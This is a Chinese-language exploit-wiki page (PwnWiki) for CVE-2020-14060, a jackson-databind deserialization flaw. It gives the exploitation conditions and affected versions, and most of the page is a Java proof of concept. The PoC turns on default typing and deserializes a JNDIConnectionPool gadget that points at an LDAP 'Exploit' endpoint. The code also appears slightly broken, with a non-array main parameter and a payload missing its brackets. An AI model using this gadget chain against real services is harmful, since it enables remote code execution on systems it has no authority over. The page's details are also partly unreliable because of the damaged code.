Loading
0

CVE-2020-14060 FasterXML jackson-databind 反序列化漏洞/zh-cn

PWNWIK.COM==免费、自由、人人可编辑的漏洞库

,

利用条件

开启enableDefaultTyping()

使用了org.apache.drill.exec:drill-jdbc-all第三方依赖

影响版本

jackson-databind before 2.9.10.4
jackson-databind before 2.8.11.6
jackson-databind before 2.7.9.7

POC

package com.jacksonTest;

import com.fasterxml.jackson.databind.ObjectMapper;

import java.io.IOException;

public class Poc {
   public static void main(String args) throws Exception {
       ObjectMapper mapper = new ObjectMapper();
       mapper.enableDefaultTyping();
       String payload = "\"oadd.org.apache.xalan.lib.sql.JNDIConnectionPool\",{\"jndiPath\":\"ldap://127.0.0.1:1099/Exploit\"}";
       try {
           Object obj = mapper.readValue(payload, Object.class);
           mapper.writeValueAsString(obj);
       } catch (IOException e) {
           e.printStackTrace();
       }
   }
}

免费、自由、人人(PwnWiki.Com)可编辑的漏洞库